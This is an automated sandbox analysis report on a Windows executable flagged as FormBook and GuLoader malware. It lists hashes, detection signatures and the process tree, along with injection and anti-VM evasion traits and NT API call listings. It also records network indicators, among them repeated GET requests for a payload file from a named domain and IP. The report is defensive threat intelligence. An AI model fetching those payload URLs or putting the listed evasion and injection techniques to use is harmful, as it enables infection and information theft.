Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ntwph4urc1.exe

Overview

General Information

Sample name:Ntwph4urc1.exe
renamed because original name is a hash value
Original sample name:ef82d714885adeb1ae55d801154e0489f3391ba0a632a10ae4caec482215fd6f.exe
Analysis ID:1588721
MD5:c57da1bb37a79e6f05722518dbadb3ce
SHA1:c7d63301754e2a380d29a9170654670e4beeb1ad
SHA256:ef82d714885adeb1ae55d801154e0489f3391ba0a632a10ae4caec482215fd6f
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook, GuLoader
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Machine Learning detection for sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Ntwph4urc1.exe (PID: 6972 cmdline: "C:\Users\user\Desktop\Ntwph4urc1.exe" MD5: C57DA1BB37A79E6F05722518DBADB3CE)
    • Ntwph4urc1.exe (PID: 7756 cmdline: "C:\Users\user\Desktop\Ntwph4urc1.exe" MD5: C57DA1BB37A79E6F05722518DBADB3CE)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.2644641710.00000000365B0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.1847253587.000000000507C000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-11T04:50:56.106860+010028032702Potentially Bad Traffic192.168.2.749974122.201.127.17443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: Ntwph4urc1.exeVirustotal: Detection: 75%Perma Link
      Source: Ntwph4urc1.exeReversingLabs: Detection: 73%
      Yara detected FormBook
      Source: Yara matchFile source: 00000009.00000002.2644641710.00000000365B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Machine Learning detection for sample
      Source: Ntwph4urc1.exeJoe Sandbox ML: detected
      Source: Ntwph4urc1.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 122.201.127.17:443 -> 192.168.2.7:49974 version: TLS 1.2
      Source: Ntwph4urc1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: Ntwph4urc1.exe, 00000009.00000001.1842784035.0000000000649000.00000008.00000001.01000000.00000006.sdmp
      Source: Binary string: wntdll.pdbUGP source: Ntwph4urc1.exe, 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000009.00000003.2275206703.00000000365BD000.00000004.00000020.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000009.00000003.2277143725.000000003676F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: Ntwph4urc1.exe, Ntwph4urc1.exe, 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000009.00000003.2275206703.00000000365BD000.00000004.00000020.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000009.00000003.2277143725.000000003676F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Ntwph4urc1.exe, 00000009.00000001.1842784035.0000000000649000.00000008.00000001.01000000.00000006.sdmp
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 5_2_0040674C FindFirstFileW,FindClose,5_2_0040674C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 5_2_00405B00 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_00405B00
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 5_2_00402902 FindFirstFileW,5_2_00402902
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49974 -> 122.201.127.17:443
      Source: global trafficHTTP traffic detected: GET /yzSJO174.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: babalharra.com.auCache-Control: no-cache
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /yzSJO174.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: babalharra.com.auCache-Control: no-cache
      Source: global trafficDNS traffic detected: DNS query: babalharra.com.au
      Source: Ntwph4urc1.exe, 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Ntwph4urc1.exe, 00000005.00000000.1271388183.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Ntwph4urc1.exe, 00000009.00000000.1839438284.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: Ntwph4urc1.exe, 00000009.00000001.1842784035.0000000000649000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
      Source: Ntwph4urc1.exe, 00000009.00000001.1842784035.00000000005F2000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: Ntwph4urc1.exe, 00000009.00000001.1842784035.00000000005F2000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: Ntwph4urc1.exe, 00000009.00000002.2624930358.0000000006968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://babalharra.com.au/
      Source: Ntwph4urc1.exe, 00000009.00000002.2624930358.0000000006968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://babalharra.com.au/o
      Source: Ntwph4urc1.exe, 00000009.00000002.2624930358.0000000006968000.00000004.00000020.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000009.00000002.2624860948.0000000006880000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://babalharra.com.au/yzSJO174.bin
      Source: Ntwph4urc1.exe, 00000009.00000002.2624930358.0000000006968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://babalharra.com.au/yzSJO174.binF
      Source: Ntwph4urc1.exe, 00000009.00000001.1842784035.0000000000649000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
      Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
      Source: unknownHTTPS traffic detected: 122.201.127.17:443 -> 192.168.2.7:49974 version: TLS 1.2
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 5_2_00405595 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,5_2_00405595

      E-Banking Fraud

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000009.00000002.2644641710.00000000365B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369935C0 NtCreateMutant,LdrInitializeThunk,9_2_369935C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36992DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_36992DF0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36993090 NtSetValueKey,9_2_36993090
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36993010 NtOpenDirectoryObject,9_2_36993010
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36993D10 NtOpenProcessToken,9_2_36993D10
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36993D70 NtOpenThread,9_2_36993D70
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369939B0 NtGetContextThread,9_2_369939B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36994650 NtSuspendThread,9_2_36994650
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36994340 NtSetContextThread,9_2_36994340
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36992E80 NtReadVirtualMemory,9_2_36992E80
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36992EA0 NtAdjustPrivilegesToken,9_2_36992EA0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36992EE0 NtQueueApcThread,9_2_36992EE0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36992E30 NtWriteVirtualMemory,9_2_36992E30
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36992F90 NtProtectVirtualMemory,9_2_36992F90
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36992FB0 NtResumeThread,9_2_36992FB0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36992FA0 NtQuerySection,9_2_36992FA0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36992FE0 NtCreateFile,9_2_36992FE0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36992F30 NtCreateSection,9_2_36992F30
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36992F60 NtCreateProcessEx,9_2_36992F60
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36992CA0 NtQueryInformationToken,9_2_36992CA0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36992CC0 NtQueryVirtualMemory,9_2_36992CC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36992CF0 NtOpenProcess,9_2_36992CF0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36992C00 NtQueryInformationProcess,9_2_36992C00
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36992C70 NtFreeVirtualMemory,9_2_36992C70
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36992C60 NtCreateKey,9_2_36992C60
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36992DB0 NtEnumerateKey,9_2_36992DB0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36992DD0 NtDelayExecution,9_2_36992DD0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36992D10 NtMapViewOfSection,9_2_36992D10
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36992D00 NtSetInformationFile,9_2_36992D00
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36992D30 NtUnmapViewOfSection,9_2_36992D30
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36992AB0 NtWaitForSingleObject,9_2_36992AB0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36992AD0 NtReadFile,9_2_36992AD0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36992AF0 NtWriteFile,9_2_36992AF0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36992B80 NtQueryInformationFile,9_2_36992B80
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36992BA0 NtEnumerateValueKey,9_2_36992BA0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36992BF0 NtAllocateVirtualMemory,9_2_36992BF0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36992BE0 NtQueryValueKey,9_2_36992BE0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36992B60 NtClose,9_2_36992B60
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 5_2_004034A2 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_004034A2
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 5_2_74351B5F5_2_74351B5F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A116CC9_2_36A116CC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1F7B09_2_36A1F7B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1F43F9_2_36A1F43F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369514609_2_36951460
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369FD5B09_2_369FD5B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A175719_2_36A17571
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369652A09_2_369652A0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A012ED9_2_36A012ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697B2C09_2_3697B2C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369A739A9_2_369A739A
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1132D9_2_36A1132D
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694D34C9_2_3694D34C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1F0E09_2_36A1F0E0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A170E99_2_36A170E9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369670C09_2_369670C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A0F0CC9_2_36A0F0CC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3696B1B09_2_3696B1B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A2B16B9_2_36A2B16B
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F1729_2_3694F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3699516C9_2_3699516C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36969EB09_2_36969EB0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36961F929_2_36961F92
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1FFB19_2_36A1FFB1
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36923FD29_2_36923FD2
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36923FD59_2_36923FD5
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1FF099_2_36A1FF09
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1FCF29_2_36A1FCF2
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369D9C329_2_369D9C32
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697FDC09_2_3697FDC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A17D739_2_36A17D73
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36963D409_2_36963D40
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A11D5A9_2_36A11D5A
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A01AA39_2_36A01AA3
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369FDAAC9_2_369FDAAC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369A5AA09_2_369A5AA0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A0DAC69_2_36A0DAC6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A17A469_2_36A17A46
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1FA499_2_36A1FA49
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369D3A6C9_2_369D3A6C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697FB809_2_3697FB80
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3699DBF99_2_3699DBF9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369D5BF09_2_369D5BF0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1FB769_2_36A1FB76
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369638E09_2_369638E0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369CD8009_2_369CD800
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369F59109_2_369F5910
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369699509_2_36969950
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697B9509_2_3697B950
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697C6E09_2_3697C6E0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695C7C09_2_3695C7C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369847509_2_36984750
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369607709_2_36960770
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A0E4F69_2_36A0E4F6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A124469_2_36A12446
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A205919_2_36A20591
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369605359_2_36960535
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369E02C09_2_369E02C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A002749_2_36A00274
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A203E69_2_36A203E6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3696E3F09_2_3696E3F0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1A3529_2_36A1A352
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369F20009_2_369F2000
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A201AA9_2_36A201AA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A181CC9_2_36A181CC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369FA1189_2_369FA118
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369501009_2_36950100
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369E81589_2_369E8158
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36972E909_2_36972E90
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1CE939_2_36A1CE93
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1EEDB9_2_36A1EEDB
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1EE269_2_36A1EE26
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36960E599_2_36960E59
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369DEFA09_2_369DEFA0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36952FC89_2_36952FC8
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3696CFE09_2_3696CFE0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36980F309_2_36980F30
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369A2F289_2_369A2F28
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369D4F409_2_369D4F40
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A00CB59_2_36A00CB5
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36950CF29_2_36950CF2
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36960C009_2_36960C00
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36978DBF9_2_36978DBF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695ADE09_2_3695ADE0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369FCD1F9_2_369FCD1F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3696AD009_2_3696AD00
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695EA809_2_3695EA80
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A16BD79_2_36A16BD7
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1AB409_2_36A1AB40
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369468B89_2_369468B8
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3698E8F09_2_3698E8F0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369628409_2_36962840
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3696A8409_2_3696A840
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A2A9A69_2_36A2A9A6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369629A09_2_369629A0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369769629_2_36976962
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: String function: 369A7E54 appears 101 times
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: String function: 369DF290 appears 105 times
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: String function: 369CEA12 appears 86 times
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: String function: 3694B970 appears 272 times
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: String function: 36995130 appears 58 times
      Source: Ntwph4urc1.exe, 00000009.00000003.2275206703.00000000366E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Ntwph4urc1.exe
      Source: Ntwph4urc1.exe, 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Ntwph4urc1.exe
      Source: Ntwph4urc1.exe, 00000009.00000003.2277143725.000000003689C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Ntwph4urc1.exe
      Source: Ntwph4urc1.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal80.troj.evad.winEXE@3/5@1/1
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 5_2_004034A2 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_004034A2
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 5_2_00404835 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,5_2_00404835
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 5_2_004021A2 CoCreateInstance,5_2_004021A2
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspiresJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeFile created: C:\Users\user~1\AppData\Local\Temp\nspB49F.tmpJump to behavior
      Source: Ntwph4urc1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: Ntwph4urc1.exeVirustotal: Detection: 75%
      Source: Ntwph4urc1.exeReversingLabs: Detection: 73%
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeFile read: C:\Users\user\Desktop\Ntwph4urc1.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Ntwph4urc1.exe "C:\Users\user\Desktop\Ntwph4urc1.exe"
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeProcess created: C:\Users\user\Desktop\Ntwph4urc1.exe "C:\Users\user\Desktop\Ntwph4urc1.exe"
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeProcess created: C:\Users\user\Desktop\Ntwph4urc1.exe "C:\Users\user\Desktop\Ntwph4urc1.exe"Jump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: propsys.dllJump to behavior
